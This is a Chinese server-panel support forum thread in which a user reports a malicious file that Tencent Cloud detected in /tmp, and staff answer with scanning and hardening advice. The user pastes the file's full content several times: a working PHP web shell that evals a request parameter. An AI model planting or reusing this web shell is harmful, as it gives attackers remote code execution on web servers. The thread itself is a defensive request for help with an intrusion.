【待反馈】/tmp目录下,腾讯云检测服务器中恶意文件
为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:8.0.6问题描述: 腾讯云检测服务器中恶意文件,文件路径 :/tmp/php8jTkfx
这是文件的内容:<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?>
相关截图(日志、错误):
tmp这个目录下出现了一个恶意文件,腾讯云
本帖最后由 宝塔用户_wimffm 于 2024-7-10 11:56 编辑为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:8.0.6
问题描述: 腾讯云检测服务器中恶意文件,文件路径 :/tmp/php8jTkfx
这是文件的内容:<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?>
相关截图(日志、错误):
宝塔用户_wimffm 发表于 2024-7-10 11:52
为了能快速了解并处理您的问题,请提供以下基础信息:
您好,您在面板用微步木马扫描这个两个文件看一下 运维技术阿闯 发表于 2024-7-10 14:38
您好,您在面板用微步木马扫描这个两个文件看一下
现在扫描不了了。我把这个文件删除了 运维技术阿闯 发表于 2024-7-10 14:38
您好,您在面板用微步木马扫描这个两个文件看一下
<?php class GaM10fA5 { public function __construct($H7mu6){ @eval("/*ZG5zknRfSk*/".$H7mu6.""); }}new GaM10fA5($_REQUEST['2022']);?><?php echo md5('666');?> 这个木马文件里面的内容。我想把这个文件下载下来,本地的火绒杀毒软件报毒直接给删除了 宝塔用户_wimffm 发表于 2024-7-10 17:21
这个木马文件里面的内容。我想把这个文件下载下来,本地的火绒杀毒软件报毒直接给删除了 ...
开启一下系统加固和防入侵和防篡改吧,防止挂马 我也收到提醒了,但是进去又找不到这个文件。 运维技术阿闯 发表于 2024-7-10 18:02
开启一下系统加固和防入侵和防篡改吧,防止挂马
官方技术,我也收到这个提醒了。但是进去路径又找不到这个文件。 测速网 发表于 2024-7-11 01:46
官方技术,我也收到这个提醒了。但是进去路径又找不到这个文件。
问一下腾讯云那边,看看是怎么回事,找不到文件 运维技术阿闯 发表于 2024-7-15 09:30
问一下腾讯云那边,看看是怎么回事,找不到文件
这个木马又出现了
宝塔用户_wimffm 发表于 2024-7-19 14:40
这个木马又出现了
您好,木马在/tmp下,说明木马被拦截成功了,被拦截的文件没有到网站文件下,就遗留到了/tmp目录下.
这个就说明拦截木马成功了, 运维技术阿闯 发表于 2024-7-19 14:46
您好,木马在/tmp下,说明木马被拦截成功了,被拦截的文件没有到网站文件下,就遗留到了/tmp目录下.
这个 ...
被拦截的木马就存放在tmp这个目录下嘛
运维技术阿闯 发表于 2024-7-19 14:46
您好,木马在/tmp下,说明木马被拦截成功了,被拦截的文件没有到网站文件下,就遗留到了/tmp目录下.
这个 ...
那我需要做什么处理吗 宝塔用户_wimffm 发表于 2024-7-19 14:52
那我需要做什么处理吗
您好,是的,被拦截的就放在了tmp目录下的,这些文件对您网站没有伤害
页:
[1]